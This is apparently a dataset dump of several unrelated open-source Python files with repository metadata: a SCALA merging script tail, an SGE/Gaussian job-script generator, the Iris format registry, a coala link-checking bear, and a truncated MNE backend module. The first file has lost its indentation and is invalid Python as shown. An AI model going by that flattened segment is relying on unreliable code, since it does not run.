file.write('\n')
file.close()
# Clean
fileexists = os.path.exists(output_ref_initial)
if fileexists == 1:
os.remove(output_ref_initial)
fileexists = os.path.exists('mi_scales.txt')
if fileexists == 1:
os.remove('mi_scales.txt')
fileexists = os.path.exists('mi_rogues.txt')
if fileexists == 1:
os.remove('mi_rogues.txt')
fileexists = os.path.exists('mi_normplot.txt')
if fileexists == 1:
os.remove('mi_normplot.txt')
fileexists = os.path.exists('mi_plot.txt')
if fileexists == 1:
os.remove('mi_plot.txt')
fileexists = os.path.exists('fort.10')
if fileexists == 1:
os.remove('fort.10')
fileexists = os.path.exists('COORDS')
if fileexists == 1:
os.remove('COORDS')
fileexists = os.path.exists('ROGUEPLOT')
if fileexists == 1:
os.remove('ROGUEPLOT')
fileexists = os.path.exists('CORRELPLOT')
if fileexists == 1:
os.remove('CORRELPLOT')
# Capture table data to check merging
aList_res_high = []
aList_ioversigi = []
table_length = 0
read_table = 'no'
parse_table = 'no'
file = open(output_log_initial,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
aLine = eachLine.split()
if parse_table == 'yes':
num_entries = len(aLine)
if num_entries > 12:
res_high = aLine[2]
ioversigi = aLine[12]
aList_res_high.append(res_high)
aList_ioversigi.append(ioversigi)
# Find table segment
if eachLine.find('N 1/d^2 Dmin(A) Rmrg Rfull Rcum Ranom Nanom Av_I SIGMA I/sigma sd Mn(I/sd)') > -1:
read_table = 'yes'
if parse_table == 'yes' and aLine[0] == '$$':
read_table = 'no'
parse_table = 'no'
if read_table == 'yes' and aLine[0] == '$$':
parse_table = 'yes'
# Analyse table
table_length = len(aList_res_high)
count = 0
while count < table_length:
res_high = aList_res_high[count]
ioversigi = aList_ioversigi[count]
if ioversigi.find('.') > -1:
res_high = float(res_high)
ioversigi = float(ioversigi)
# Get optimal resolution
if ioversigi > ioversigi_limit and res_high < 3.5:
merging_res = res_high
merging_res = str(merging_res)
count = count + 1
print 'Using estimated resolution:',merging_res,'A'
fileexists = os.path.exists(output_log_initial)
if fileexists == 1:
os.remove(output_log_initial)
###############################################################
# Scale and average the integrated and profile-fitted reflns #
###############################################################
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Merging'
output_ref = 'ScalAverage_' + data_code_number + '.mtz'
output_log = 'scala_scaleaverage_' + data_code_number + '.log'
file = open('mi_scala.inp','w')
file.write('TITLE First pass merging\n')
file.write('RUN 1 ALL\n')
file.write('INTENSITIES PARTIAL\n')
file.write('CYCLES 20\n')
file.write('ANOMALOUS OFF\n')
file.write('SDCORRECTION 1.3 0.02\n')
file.write('SCALES ROTATION SPACING 5 SECONDARY 6 TAILS BFACTOR ON BROTATION SPACING 20\n')
file.write('TIE BFACTOR 0.5\n')
file.write('REJECT 6 6 ALL -8 -8\n')
file.write('EXCLUDE EMAX 10\n')
if merging_res != 'none':
file.write('RESOLUTION ')
file.write(merging_res)
file.write('\n')
file.close()
run_scala = 'scala HKLIN mi_integration.mtz HKLOUT ' + output_ref +\
' SCALES mi_scales.txt ROGUES mi_rogues.txt NORMPLOT mi_normplot.txt PLOT mi_plot.txt < mi_scala.inp > ' \
+ output_log
os.system(run_scala)
fileexists = os.path.exists(output_ref)
if fileexists == 0:
print 'Process SCALA seems to have failed'
time.sleep(4)
return 1
else:
os.remove('mi_scala.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Merging done : ')
file.write(runtime)
file.write('\n')
file.close()
fileexists = os.path.exists('mi_scales.txt')
if fileexists == 1:
os.remove('mi_scales.txt')
fileexists = os.path.exists('mi_rogues.txt')
if fileexists == 1:
os.remove('mi_rogues.txt')
fileexists = os.path.exists('mi_normplot.txt')
if fileexists == 1:
os.remove('mi_normplot.txt')
fileexists = os.path.exists('mi_plot.txt')
if fileexists == 1:
os.remove('mi_plot.txt')
fileexists = os.path.exists('fort.10')
if fileexists == 1:
os.remove('fort.10')
fileexists = os.path.exists('COORDS')
if fileexists == 1:
os.remove('COORDS')
fileexists = os.path.exists('ROGUEPLOT')
if fileexists == 1:
os.remove('ROGUEPLOT')
fileexists = os.path.exists('CORRELPLOT')
if fileexists == 1:
os.remove('CORRELPLOT')
######################
# Tail end processes #
######################
# Transfer the final reflection and output files to defined space or leave in image directory
if final_workdir != 'none' and final_workdir != image_dir:
output_ref_destination = os.path.join(final_workdir,output_ref)
output_log_destination = os.path.join(final_workdir,output_log)
output_int_destination = os.path.join(final_workdir,output_integrate_log)
fileexists = os.path.exists(output_ref_destination)
if fileexists != 0:
os.remove(output_ref_destination)
fileexists = os.path.exists(output_log_destination)
if fileexists != 0:
os.remove(output_log_destination)
fileexists = os.path.exists(output_int_destination)
if fileexists != 0:
os.remove(output_int_destination)
os.rename(output_ref,output_ref_destination)
os.rename(output_log,output_log_destination)
os.rename(output_integrate_log,output_int_destination)
else:
output_ref_destination = os.path.join(image_dir,output_ref)
output_log_destination = os.path.join(image_dir,output_log)
output_int_destination = os.path.join(image_dir,output_integrate_log)
# Log and clean-up
runtime = time.ctime(time.time())
print 'Date:',runtime
print '\nIntegrated and merged intensity file:',output_ref_destination
print 'Integration log file file:',output_int_destination
print 'Merging statistics log file:',output_log_destination
time.sleep(4)
return 0
# Script entry point: run the full auto-processing pipeline and use its
# integer status (0 = success, 1 = failure) as the process exit code.
if __name__ == "__main__":
    sys.exit(Run())
|
mifit/miexpert
|
mi_integrate.py
|
Python
|
gpl-3.0
| 36,722
|
[
"CRYSTAL"
] |
dcc033b0c7468067d54a3f016bfacee01e5fd5f6c269a17b9a13456f806f1f1c
|
import os
from commands import getoutput
from glob import glob
def gen_que(comfile, queue = 'gb', gauversion = 'd', QUE_PATH = False):
    """Generate an SGE submission script (.q) for a Gaussian 09 input file.

    comfile    -- path of the Gaussian .com input file
    queue      -- queue code selecting processor, group and queue
                  directives ('gb', 'b1', 'b2', 'ib', 'sp' or 'rp')
    gauversion -- Gaussian 09 revision key: 'a', 'c' or 'd'
    QUE_PATH   -- when True, build the script name from the input file's
                  path components (joined with '-') instead of only its
                  base name

    Returns the full path of the .q script written (same directory as
    *comfile*, same base name with a '.q' extension, '_'-prefixed when
    the name starts with a digit).
    """
    QUE_EXT = '.q'
    # Template of the submission script; the SET_* placeholders are
    # substituted below before the file is written.
    text = """#!/bin/bash
### Request number of processors
SET_PROCS_NUM
### Previleges
SET_GRP_NAME
SET_QUE_NAME
### Home directory where the input files are located
SET_HOME
SET_STDOUT
SET_STDERR
### System variables
echo "This job is running on " $HOSTNAME
#$ -V
#$ -cwd
### Create NODE directory
export NODE_JOB_DIR=/scratch/$JOB_ID
mkdir -p $NODE_JOB_DIR
cd $NODE_JOB_DIR
### JOB NAME
SET_JOBNAME
### Copy the files to the NODE
cp $HOME_JOB_DIR/$JOBNAME $NODE_JOB_DIR
export JOBNAME_out=`basename $JOBNAME .com`.log
### Sets gaussian variables
export GAUSS_SCRDIR=$NODE_JOB_DIR
SET_GSOURCE
### Runs gaussian
g09 <$JOBNAME> $HOME_JOB_DIR/$JOBNAME_out
### Cleans scratch directory
rm $NODE_JOB_DIR/*.rwf
rm $NODE_JOB_DIR/*.scr
rm $NODE_JOB_DIR/*.chk
### Move file from NODE directory to the HOME directory
mv $NODE_JOB_DIR/* $HOME_JOB_DIR
rm -rf $NODE_JOB_DIR
echo `date '+%d %b %H:%M'` $HOME_JOB_DIR/$JOBNAME >> ~/log.que
"""
    # Queue-specific parallel-environment directives.
    PROC_STR = {
        'gb': "#$ -pe shared_mem 8",
        'b1': "#$ -pe shared_mem 8",
        'b2': "#$ -pe shared_mem 8",
        'ib': "#$ -pe shared_mem 8",
        'sp': "#$ -pe shm_s 12",
        'rp': "#$ -pe shm_r 16"
    }
    # Queue-specific project/group directives.
    GRP_STR = {
        'gb': "#$ -P grupoA",
        'b1': "#$ -P grupoA",
        'b2': "#$ -P grupoA",
        'ib': "#$ -P grupoA",
        'sp': "#$ -P grupoA",
        'rp': "#$ -P grupoA"
    }
    # Queue-name directives ('gb' submits to the default queue).
    QUE_STR = {
        'gb': "",
        'b1': "#$ -q BIO1",
        'b2': "#$ -q BIO2",
        'ib': "#$ -q INFINIBAND",
        'sp': "#$ -q SPECIAL",
        'rp': "#$ -q RAPTOR"
    }
    # Path of the G09 environment script, parameterized by revision string.
    GAU_VERSION_PATH = {
        'gb': "source /opt/programs/gaussian/g09/%s/G09.sh",
        'b1': "source /opt/programs/gaussian/g09/%s/G09.sh",
        'b2': "source /opt/programs/gaussian/g09/%s/G09.sh",
        'ib': "source /opt/programs/gaussian/g09/%s/G09.sh",
        'sp': "source /opt/programs/gaussian/g09/%s/G09.sh",
        'rp': "source /opt/programs/gaussian/g09/%s/G09.sh"
    }
    # Revision key -> installed revision directory name.
    GAU_VERSION = {
        'a': "a_pgi105",
        'c': "c_pgi133",
        'd': "d_pgi133"
    }
    # comfile without preceeding path (if any)
    HOME_JOB_DIR = os.path.dirname(os.path.realpath(comfile)) # full path
    comfile_wd = comfile.split('/')[-1] # filename only
    comfile_full = '%s/%s' % (HOME_JOB_DIR, comfile_wd) # filename full
    if QUE_PATH:
        # Encode the directory structure (from the 4th path component on)
        # into the script name.
        que_wd = '-'.join((comfile_full).split('/')[3:])
    else:
        que_wd = comfile_wd
    # Prefix a '_' when the name starts with a digit — presumably because
    # SGE job names may not begin with a digit; verify against the cluster.
    if que_wd[0].isdigit():
        que_wd = '_' + que_wd
    que_full = '%s/%s' % (HOME_JOB_DIR, que_wd) # que full path
    # change the '.com' extension to '.q'
    que_full = os.path.splitext(que_full)[0] + QUE_EXT
    # Substitute the SET_* placeholders in the template.
    text = text.replace('SET_HOME', 'export HOME_JOB_DIR=%s' % HOME_JOB_DIR)
    text = text.replace('SET_STDOUT', '#$ -o %s' % HOME_JOB_DIR)
    text = text.replace('SET_STDERR', '#$ -e %s' % HOME_JOB_DIR)
    text = text.replace('SET_JOBNAME', 'export JOBNAME=%s' % comfile_wd)
    text = text.replace('SET_PROCS_NUM', PROC_STR[queue])
    text = text.replace('SET_GRP_NAME', GRP_STR[queue])
    text = text.replace('SET_QUE_NAME', QUE_STR[queue])
    text = text.replace('SET_GSOURCE', GAU_VERSION_PATH[queue] % (
        GAU_VERSION[gauversion]))
    # write .que
    with open(que_full, 'w') as f:
        f.write(text)
    return que_full
# GAUSSIAN STUFF
def config_gaucom(comfile, queue = 'gb', gauversion = 'd'):
    """Rewrite a Gaussian .com file in place so that its %mem and
    %nprocshared Link 0 lines match the resources of the chosen queue.

    comfile    -- path of the Gaussian input file (must be a str)
    queue      -- queue code ('gb', 'b1', 'b2', 'ib', 'sp' or 'rp')
    gauversion -- accepted for interface symmetry with gen_que(); unused

    Raises RuntimeError when *comfile* is not a filename string.
    """
    # Per-queue Link 0 header lines (processor count and memory).
    NPROC_STR = {
        'gb': "%nprocshared=8\n",
        'b1': "%nprocshared=8\n",
        'b2': "%nprocshared=8\n",
        'ib': "%nprocshared=8\n",
        'sp': "%nprocshared=12\n",
        'rp': "%nprocshared=16\n"
    }
    MEM_STR = {
        'gb': "%mem=6200MB\n",
        'b1': "%mem=6200MB\n",
        'b2': "%mem=6200MB\n",
        'ib': "%mem=6200MB\n",
        'sp': "%mem=22500MB\n",
        'rp': "%mem=62500MB\n"
    }
    # TODO implement for gaucom objects
    if type(comfile) is not str:
        errormessage = 'GaussianJob.config_gaucom() takes FILENAME as input'
        raise RuntimeError(errormessage)
    with open(comfile) as handle:
        lines = handle.readlines()
    # Keep everything except %mem/%nproc directives that appear before the
    # route section (the first line starting with '#'); from the route
    # section onward the file is copied untouched.
    kept = []
    for position, raw in enumerate(lines):
        content = raw.strip()
        if content.startswith('#'):
            kept.extend(lines[position:])
            break
        if content.startswith(('%mem', '%nproc', '%Mem', '%Nproc')):
            continue
        kept.append(raw)
    # Prepend the queue-appropriate memory and processor directives.
    kept[:0] = [MEM_STR[queue], NPROC_STR[queue]]
    with open(comfile, 'w') as handle:
        handle.writelines(kept)
def sge_status(gauname_or_jobid):
    """Return the SGE queue status of a Gaussian job.

    :param gauname_or_jobid: numeric SGE job id (int), or a Gaussian
        file name such as ``job.com`` / ``job.log`` (str).  For a file
        name, the job id is recovered from the matching ``.q`` script's
        ``.o<jobid>`` output files, or — failing that — by scanning
        ``qstat -j`` for a job with that script name in this directory.
    :returns: ``(status, jobid)`` where ``status`` is the qstat state
        column (e.g. ``'r'``, ``'qw'``) or ``False`` when the job is
        not listed.
    :raises RuntimeError: if qstat lists the job id more than once.
    """
    qstat = getoutput('qstat')
    jobid = None  # resolved below; stays None when it cannot be found
    if type(gauname_or_jobid) == int:
        jobid = gauname_or_jobid
    elif type(gauname_or_jobid) == str:
        gauname = gauname_or_jobid
    if not jobid:
        # Rebuild the submission-script name the same way gen_que() does:
        # same base name with a '.q' extension, '_'-prefixed for digits.
        QUE_EXT = '.q'
        quename = os.path.splitext(gauname)[0] + QUE_EXT
        if quename[0].isdigit():
            quename = '_' + quename
        # SGE writes stdout to '<quename>.o<jobid>'; take the newest id
        # when several runs left output files behind.
        jobsto = glob(quename + '.o*')
        if len(jobsto) == 1:
            jobid = int(jobsto[0].split('%s.o' % QUE_EXT)[-1])
        elif len(jobsto) > 1:
            jobid = max([int(j.split('%s.o' % QUE_EXT)[-1]) for j in jobsto])
        # seek in qstat
        elif len(jobsto) == 0:
            # No output file yet: scan every queued job for a matching
            # script name submitted from this working directory.
            jobids = [int(line[:8]) for line in qstat.split('\n')[2:]]
            for j in jobids:
                job_name = getoutput('qstat -j %d | grep job_name:' % j)
                job_name = job_name.split()[1]
                if job_name == quename:
                    cwd = getoutput('qstat -j %d | grep stdout' % j)
                    cwd = cwd.split('NONE:NONE:')[1]
                    # BUG FIX: os.path has no getcwd(); use os.getcwd().
                    if cwd == os.getcwd():  # not working with paths yet
                        jobid = j
    # Now that jobid is defined, collect the state column for every
    # qstat row carrying this job id (columns 40-45 hold the state).
    status = []
    for line in qstat.split('\n')[2:]:
        if int(line[:8]) == jobid:
            status.append(line[40:45].strip())
    # not found
    if len(status) == 0:
        status.append(False)
    # multiple
    elif len(status) > 1:
        raise RuntimeError('Multiple qstat jobs found!')
    return status[0], jobid
|
eduardoftoliveira/oniomMacGyver
|
omg/qtrex.py
|
Python
|
gpl-3.0
| 7,009
|
[
"Gaussian"
] |
8a13fefd01c35d068a517084ba37a7330c53f374c4adad0fa637c3aa81c0d265
|
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""
A package for converting cubes to and from specific file formats.
"""
from iris.io.format_picker import (
FileExtension,
FormatAgent,
FormatSpecification,
MagicNumber,
UriProtocol,
LeadingLine,
)
from . import abf
from . import um
from . import name
from . import netcdf
from . import nimrod
from . import pp
__all__ = ["FORMAT_AGENT"]

# Global registry used to identify the file format of a given URI; the
# format specifications for every supported format are registered on it
# below via add_spec().
FORMAT_AGENT = FormatAgent()
FORMAT_AGENT.__doc__ = (
    "The FORMAT_AGENT is responsible for identifying the "
    "format of a given URI. New formats can be added "
    "with the **add_spec** method."
)

#
# PP files.
#
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Post Processing file (PP)",
        MagicNumber(4),
        0x00000100,
        pp.load_cubes,
        priority=5,
        constraint_aware_handler=True,
    )
)

FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Post Processing file (PP) little-endian",
        MagicNumber(4),
        0x00010000,  # byte-swapped form of the big-endian magic above
        pp.load_cubes_little_endian,
        priority=3,
        constraint_aware_handler=True,
    )
)
#
# GRIB files.
#
def _load_grib(*args, **kwargs):
try:
from iris_grib import load_cubes
except ImportError:
raise RuntimeError(
"Unable to load GRIB file - "
'"iris_grib" package is not installed.'
)
return load_cubes(*args, **kwargs)
# NB. Because this is such a "fuzzy" check, we give this a very low
# priority to avoid collateral damage from false positives.
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "GRIB",
        MagicNumber(100),
        lambda header_bytes: b"GRIB" in header_bytes,
        _load_grib,
        priority=1,
    )
)

#
# netCDF files.
#
# Classic netCDF: the 4-byte magic is the bytes 'CDF\x01'.
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "NetCDF", MagicNumber(4), 0x43444601, netcdf.load_cubes, priority=5
    )
)

# 64-bit offset variant: 'CDF\x02'.
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "NetCDF 64 bit offset format",
        MagicNumber(4),
        0x43444602,
        netcdf.load_cubes,
        priority=5,
    )
)

# This covers both v4 and v4 classic model.
# (The 8-byte magic is the HDF5 file signature '\x89HDF\r\n\x1a\n'.)
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "NetCDF_v4",
        MagicNumber(8),
        0x894844460D0A1A0A,
        netcdf.load_cubes,
        priority=5,
    )
)

# OPeNDAP access is identified by the URI protocol rather than by file
# contents; the spec is registered and the temporary name deleted.
_nc_dap = FormatSpecification(
    "NetCDF OPeNDAP",
    UriProtocol(),
    lambda protocol: protocol in ["http", "https"],
    netcdf.load_cubes,
    priority=6,
)
FORMAT_AGENT.add_spec(_nc_dap)
del _nc_dap

#
# UM Fieldsfiles.
#
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Fieldsfile (FF) pre v3.1",
        MagicNumber(8),
        0x000000000000000F,
        um.load_cubes,
        priority=3,
        constraint_aware_handler=True,
    )
)

FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Fieldsfile (FF) post v5.2",
        MagicNumber(8),
        0x0000000000000014,
        um.load_cubes,
        priority=4,
        constraint_aware_handler=True,
    )
)

FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Fieldsfile (FF) ancillary",
        MagicNumber(8),
        0xFFFFFFFFFFFF8000,
        um.load_cubes,
        priority=3,
        constraint_aware_handler=True,
    )
)

FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Fieldsfile (FF) converted " "with ieee to 32 bit",
        MagicNumber(4),
        0x00000014,
        um.load_cubes_32bit_ieee,
        priority=3,
        constraint_aware_handler=True,
    )
)

FORMAT_AGENT.add_spec(
    FormatSpecification(
        "UM Fieldsfile (FF) ancillary " "converted with ieee to 32 bit",
        MagicNumber(4),
        0xFFFF8000,
        um.load_cubes_32bit_ieee,
        priority=3,
        constraint_aware_handler=True,
    )
)

#
# NIMROD files.
#
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "NIMROD", MagicNumber(4), 0x00000200, nimrod.load_cubes, priority=3
    )
)

#
# NAME files.
#
# Text format recognized by its first (stripped) line.
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "NAME III",
        LeadingLine(),
        lambda line: line.lstrip().startswith(b"NAME III"),
        name.load_cubes,
        priority=5,
    )
)

#
# ABF/ABL
#
# These carry no magic number; matched purely on file extension.
FORMAT_AGENT.add_spec(
    FormatSpecification(
        "ABF", FileExtension(), ".abf", abf.load_cubes, priority=3
    )
)

FORMAT_AGENT.add_spec(
    FormatSpecification(
        "ABL", FileExtension(), ".abl", abf.load_cubes, priority=3
    )
)
|
pp-mo/iris
|
lib/iris/fileformats/__init__.py
|
Python
|
lgpl-3.0
| 4,539
|
[
"NetCDF"
] |
7e9fdb7e1c5d73dcfa9810b4377f2a8c8c3a9db41ec7e265e0217d86a4b2bf32
|
import re
import requests
from difflib import SequenceMatcher
from coalib.results.Diff import Diff
from coalib.bears.LocalBear import LocalBear
from coalib.bears.requirements.PipRequirement import PipRequirement
from coalib.results.RESULT_SEVERITY import RESULT_SEVERITY
from coalib.results.Result import Result
from coalib.bearlib import deprecate_settings
class InvalidLinkBear(LocalBear):
    """Bear that scans text files for http(s) URLs and reports links that
    are broken (no response, 404/410/50x) and, optionally, rewrites
    redirected links."""

    DEFAULT_TIMEOUT = 2
    LANGUAGES = {"All"}
    REQUIREMENTS = {PipRequirement('requests', '2.*')}
    AUTHORS = {'The coala developers'}
    AUTHORS_EMAILS = {'coala-devel@googlegroups.com'}
    LICENSE = 'AGPL-3.0'
    CAN_DETECT = {'Documentation'}

    # IP Address of www.google.com
    check_connection_url = "http://216.58.218.174"

    @classmethod
    def check_prerequisites(cls):
        """Refuse to run when a probe of ``check_connection_url`` yields
        no HTTP status code (i.e. no internet connectivity)."""
        code = cls.get_status_code(
            cls.check_connection_url, cls.DEFAULT_TIMEOUT)
        return ("You are not connected to the internet."
                if code is None else True)

    @staticmethod
    def get_status_code(url, timeout):
        """Return the status code of a non-redirecting HEAD request to
        *url*, or None (implicitly) when the request fails/times out."""
        try:
            code = requests.head(url, allow_redirects=False,
                                 timeout=timeout).status_code
            return code
        except requests.exceptions.RequestException:
            pass

    @staticmethod
    def find_links_in_file(file, timeout, link_ignore_regex):
        """Yield ``(line_number, link, status_code)`` for URLs in *file*.

        Only the first URL per line is considered; links matching
        *link_ignore_regex* are skipped.  ``line_number`` is 1-based.
        """
        link_ignore_regex = re.compile(link_ignore_regex)
        # Matches http(s) URLs, allowing balanced parentheses in the path
        # and rejecting a trailing '.' or ',' via the lookbehinds.
        regex = re.compile(
            r'(https?://[^.:%\s_/?#[\]@\\]+\.(?:[^\s()%\'"`<>|\\]+|'
            r'\([^\s()%\'"`<>|\\]*\))*)(?<!\.)(?<!,)')
        for line_number, line in enumerate(file):
            match = regex.search(line)
            if match:
                link = match.group()
                if not link_ignore_regex.search(link):
                    code = InvalidLinkBear.get_status_code(link, timeout)
                    yield line_number + 1, link, code

    @deprecate_settings(link_ignore_regex='ignore_regex')
    def run(self, filename, file,
            timeout: int=DEFAULT_TIMEOUT,
            link_ignore_regex: str="([.\/]example\.com|\{|\$)",
            follow_redirects: bool=False):
        """
        Find links in any text file and check if they are valid.

        A link is considered valid if the server responds with a 2xx code.

        This bear can automatically fix redirects, but ignores redirect
        URLs that have a huge difference with the original URL.

        Warning: This bear will make HEAD requests to all URLs mentioned in
        your codebase, which can potentially be destructive. As an example,
        this bear would naively just visit the URL from a line that goes like
        `do_not_ever_open = 'https://api.acme.inc/delete-all-data'` wiping out
        all your data.

        :param timeout:           Request timeout period.
        :param link_ignore_regex: A regex for urls to ignore.
        :param follow_redirects:  Set to true to autocorrect redirects.
        """
        for line_number, link, code in InvalidLinkBear.find_links_in_file(
                file, timeout, link_ignore_regex):
            if code is None:
                # No HTTP response at all (connection error / timeout).
                yield Result.from_values(
                    origin=self,
                    message=('Broken link - unable to connect to '
                             '{url}').format(url=link),
                    file=filename,
                    line=line_number,
                    severity=RESULT_SEVERITY.MAJOR)
            elif not 200 <= code < 300:
                # HTTP status 404, 410 or 50x
                if code in (404, 410) or 500 <= code < 600:
                    yield Result.from_values(
                        origin=self,
                        message=('Broken link - unable to connect to {url} '
                                 '(HTTP Error: {code})'
                                 ).format(url=link, code=code),
                        file=filename,
                        line=line_number,
                        severity=RESULT_SEVERITY.NORMAL)
                if follow_redirects and 300 <= code < 400:  # HTTP status 30x
                    redirect_url = requests.head(link,
                                                 allow_redirects=True).url
                    matcher = SequenceMatcher(
                        None, redirect_url, link)
                    # NOTE(review): the closing paren looks misplaced —
                    # '(A > 0.7 and B) > 0.7' was probably meant to be
                    # 'A > 0.7 and B > 0.7'.  As written it evaluates to
                    # the same result (False > 0.7 is False; a float
                    # passes through the 'and'), so behavior is unchanged.
                    if (matcher.real_quick_ratio() > 0.7 and
                            matcher.ratio()) > 0.7:
                        # Splice the redirect target over the old link and
                        # offer the edit as a patch.
                        diff = Diff(file)
                        current_line = file[line_number - 1]
                        start = current_line.find(link)
                        end = start + len(link)
                        replacement = current_line[:start] + \
                            redirect_url + current_line[end:]
                        diff.change_line(line_number,
                                         current_line,
                                         replacement)
                        yield Result.from_values(
                            self,
                            'This link redirects to ' + redirect_url,
                            diffs={filename: diff},
                            file=filename,
                            line=line_number,
                            severity=RESULT_SEVERITY.NORMAL)
|
dosarudaniel/coala-bears
|
bears/general/InvalidLinkBear.py
|
Python
|
agpl-3.0
| 5,280
|
[
"VisIt"
] |
854d19145de840d6ad029d6e49fc9b8bb92fd84b703e3ba72e226ee7c13cdd1b
|
"""Core visualization operations."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Eric Larson <larson.eric.d@gmail.com>
# Joan Massich <mailsik@gmail.com>
# Guillaume Favelier <guillaume.favelier@gmail.com>
#
# License: Simplified BSD
import sys
import os
from contextlib import contextmanager
import importlib
from ._utils import VALID_3D_BACKENDS
from ...utils import (logger, verbose, get_config, _check_option,
_require_version, fill_doc, _validate_type)
# Module-level state for the active 3D backend.
MNE_3D_BACKEND = None  # canonical name of the selected backend (str | None)
MNE_3D_BACKEND_TESTING = False  # set True by _actors_invisible() during tests
MNE_3D_BACKEND_INTERACTIVE = False

# Maps each public backend name to the relative submodule implementing it.
_backend_name_map = dict(
    mayavi='._pysurfer_mayavi',
    pyvistaqt='._qt',
    notebook='._notebook',
)
# The imported backend module itself; set by _reload_backend().
backend = None
def _reload_backend(backend_name):
    """Import the submodule for *backend_name* (per ``_backend_name_map``)
    and install it as the module-global ``backend``."""
    global backend
    backend = importlib.import_module(name=_backend_name_map[backend_name],
                                      package='mne.viz.backends')
    logger.info('Using %s 3d backend.\n' % backend_name)
def _get_renderer(*args, **kwargs):
    """Instantiate a ``_Renderer`` from the active backend, selecting and
    importing a backend first if none is loaded yet."""
    _get_3d_backend()  # side effect: ensures the global ``backend`` is set
    return backend._Renderer(*args, **kwargs)
def _check_3d_backend_name(backend_name):
    """Validate *backend_name* and return its canonical form, mapping the
    legacy alias ``'pyvista'`` to ``'pyvistaqt'``; raises if the name is
    not a string or not one of VALID_3D_BACKENDS."""
    _validate_type(backend_name, str, 'backend_name')
    backend_name = 'pyvistaqt' if backend_name == 'pyvista' else backend_name
    _check_option('backend_name', backend_name, VALID_3D_BACKENDS)
    return backend_name
@verbose
def set_3d_backend(backend_name, verbose=None):
    """Set the 3D backend for MNE.

    The backend will be set as specified and operations will use
    that backend.

    Parameters
    ----------
    backend_name : str
        The 3d backend to select. See Notes for the capabilities of each
        backend (``'pyvistaqt'``, ``'notebook'``, and ``'mayavi'``).

        .. versionchanged:: 0.24
           The ``'pyvista'`` backend was renamed ``'pyvistaqt'``.
    %(verbose)s

    Returns
    -------
    old_backend_name : str | None
        The old backend that was in use.

    Notes
    -----
    To use PyVista, set ``backend_name`` to ``pyvistaqt`` but the value
    ``pyvista`` is still supported for backward compatibility.

    This table shows the capabilities of each backend ("✓" for full support,
    and "-" for partial support):

    .. table::
       :widths: auto

       +--------------------------------------+--------+-----------+----------+
       | **3D function:**                     | mayavi | pyvistaqt | notebook |
       +======================================+========+===========+==========+
       | :func:`plot_vector_source_estimates` | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`plot_source_estimates`        | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`plot_alignment`               | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`plot_sparse_source_estimates` | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`plot_evoked_field`            | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`plot_sensors_connectivity`    | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`snapshot_brain_montage`       | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | :func:`link_brains`                  |        | ✓         |          |
       +--------------------------------------+--------+-----------+----------+
       +--------------------------------------+--------+-----------+----------+
       | **Feature:**                                                         |
       +--------------------------------------+--------+-----------+----------+
       | Large data                           | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Opacity/transparency                 | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Support geometric glyph              | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Smooth shading                       | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Subplotting                          | ✓      | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Inline plot in Jupyter Notebook      | ✓      |           | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Inline plot in JupyterLab            | ✓      |           | ✓        |
       +--------------------------------------+--------+-----------+----------+
       | Inline plot in Google Colab          |        |           |          |
       +--------------------------------------+--------+-----------+----------+
       | Toolbar                              |        | ✓         | ✓        |
       +--------------------------------------+--------+-----------+----------+
    """
    global MNE_3D_BACKEND
    old_backend_name = MNE_3D_BACKEND
    backend_name = _check_3d_backend_name(backend_name)
    # Only (re)import the backend module when the selection changes.
    if MNE_3D_BACKEND != backend_name:
        _reload_backend(backend_name)
        MNE_3D_BACKEND = backend_name

    # Qt5 macOS 11 compatibility
    if sys.platform == 'darwin' and 'QT_MAC_WANTS_LAYER' not in os.environ:
        os.environ['QT_MAC_WANTS_LAYER'] = '1'

    return old_backend_name
def get_3d_backend():
    """Return the 3D backend currently used.

    Returns
    -------
    backend_used : str | None
        The 3d backend currently in use. If no backend is found,
        returns ``None``.

        .. versionchanged:: 0.24
           The ``'pyvista'`` backend has been renamed ``'pyvistaqt'``, so
           ``'pyvista'`` is no longer returned by this function.
    """
    try:
        backend = _get_3d_backend()
    except RuntimeError as exc:
        # No importable backend was found: log the reason and report None
        # instead of propagating the error.
        backend = None
        logger.info(str(exc))
    return backend
def _get_3d_backend():
    """Load and return the current 3d backend.

    Resolution order: already-set module global, then the user's
    ``MNE_3D_BACKEND`` configuration value, then the first backend in
    ``VALID_3D_BACKENDS`` that imports successfully.  Raises
    RuntimeError when no candidate can be imported.
    """
    global MNE_3D_BACKEND
    if MNE_3D_BACKEND is None:
        MNE_3D_BACKEND = get_config(key='MNE_3D_BACKEND', default=None)
        if MNE_3D_BACKEND is None:  # try them in order
            errors = dict()
            for name in VALID_3D_BACKENDS:
                try:
                    _reload_backend(name)
